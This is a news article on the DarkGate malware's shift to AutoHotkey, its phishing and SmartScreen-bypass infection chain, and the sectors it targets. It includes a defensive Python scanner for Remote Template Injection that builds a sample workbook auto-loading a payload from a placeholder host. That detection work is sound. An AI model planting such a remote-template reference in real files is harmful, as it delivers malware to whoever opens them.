DarkGate Malware Shifts from AutoIt to AutoHotkey in Recent Cyber Attacks

Cybersecurity experts have recently identified a shift in the tactics employed by the DarkGate malware-as-a-service (MaaS) operation, which is now utilizing AutoHotkey scripts instead of the previously favored AutoIt scripts. This adaptation, observed in version 6 of DarkGate released in March 2024 by the developer known as RastaFarEye, marks a significant attempt by threat actors to evade detection mechanisms in an ever-evolving cyber landscape.

DarkGate, a fully-featured remote access trojan (RAT), has been operational since at least 2018 and continues to evolve with each iteration. The latest version is noted for its enhanced functionality that includes command-and-control capabilities alongside modules for various malicious activities such as credential theft, keylogging, and screen capturing. It has reportedly expanded its user base, currently servicing approximately 30 subscriptions.

The security research community, particularly Trellix's Ernesto Fernández Provecho, highlighted that the incorporation of AutoHotkey into DarkGate's deployment is particularly novel. Historical data shows that this technique is not commonly used, indicating a strategic pivot to circumvent established security measures. This marks the first record of DarkGate leveraging this scripting interpreter for launching attacks, emphasizing the increasing sophistication of threat methodologies.

Documentation by McAfee Labs has traced DarkGate's transition to AutoHotkey back to late April 2024. This change has been linked to recent vulnerabilities, specifically CVE-2023-36025 and CVE-2024-21412, which are exploited to bypass Microsoft Defender SmartScreen protections. Attack vectors typically involve phishing emails that contain Microsoft Excel or HTML attachments, which, when opened, execute malicious scripts designed to harvest sensitive user data.

Alternative execution methods have also emerged, leveraging Excel macros that trigger Visual Basic Script files, which in turn invoke PowerShell commands that ultimately download the DarkGate payload. This multi-stage approach to infection reveals a deliberate effort to obscure the initial malware delivery, enhancing its operational stealth.

Version 6 of DarkGate not only introduces new commands but also removes several features present in prior versions, such as cryptomining capabilities and privilege escalation options. This reduction suggests a strategic effort to minimize detection risks associated with previously included functionalities. It also raises questions about user demand for certain capabilities, possibly reflecting a preference among a limited customer base focused on more discreet operations.

In conjunction with the rise of DarkGate, a concerning trend has emerged where cybercriminals exploit legitimate services like DocuSign. These actors are distributing customizable phishing templates on underground forums, further complicating the threat landscape. These fraudulent communications are crafted to mimic legitimate signing requests, luring individuals into divulging sensitive information or clicking malicious links.

Recent analyses by Cisco Talos reveal that the AutoHotkey-based DarkGate campaigns are primarily targeting sectors such as healthcare technology, telecommunications, and fintech across the United States, Europe, and Asia. The infection chain is initiated when users open malicious Excel documents crafted to utilize Remote Template Injection, a technique that facilitates the automatic download and execution of harmful content from remote servers.
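Remote Template Injection works because an Office Open XML package can declare relationships whose target is an external URL, so a defender can triage attachments by inspecting the package's `.rels` parts. The following scanner is an added example, not code from the article or from any of the vendors it cites; the set of relationship types it treats as content-loading (`LOADING_TYPES`) and the constructed sample workbook (with a placeholder `template.example` host) are assumptions, not indicators from a real campaign.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Assumed list: relationship types that make Office fetch and load content,
# as opposed to a plain hyperlink the user has to click.
LOADING_TYPES = ("attachedTemplate", "oleObject", "externalLink", "frame")
REMOTE_TARGET = re.compile(r"^(https?|ftp|file)://|^\\\\", re.I)


def find_remote_references(package: bytes) -> list:
    """Return (rels_part, relationship_type, target) for every relationship
    in an OOXML package whose target is an external (remote) resource."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode", "Internal") == "External" and REMOTE_TARGET.match(target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((part, rel_type, target))
    return findings


def suspicious(findings: list) -> list:
    """Keep only references Office would resolve automatically on open."""
    return [f for f in findings if f[1] in LOADING_TYPES]


def build_sample() -> bytes:
    """Constructed minimal workbook: one auto-loading remote reference plus one
    ordinary hyperlink, so the scanner has both a true hit and a benign entry."""
    rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}oleObject" '
        'Target="http://template.example/payload.xltm" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
        'Target="https://www.example.com/" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("xl/workbook.xml", "<workbook/>")
        pkg.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
    return buf.getvalue()
```

Run `suspicious(find_remote_references(open(path, "rb").read()))` over a quarantined attachment; any hit is a reason to detonate the file in a sandbox rather than release it.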

As the cybersecurity threat landscape continues to evolve, the adaptations seen in DarkGate emphasize the pressing need for organizations to strengthen their security postures. Understanding adversary tactics and techniques, especially those outlined in the MITRE ATT&CK Framework, can provide critical insights for developing effective countermeasures against these sophisticated threats.
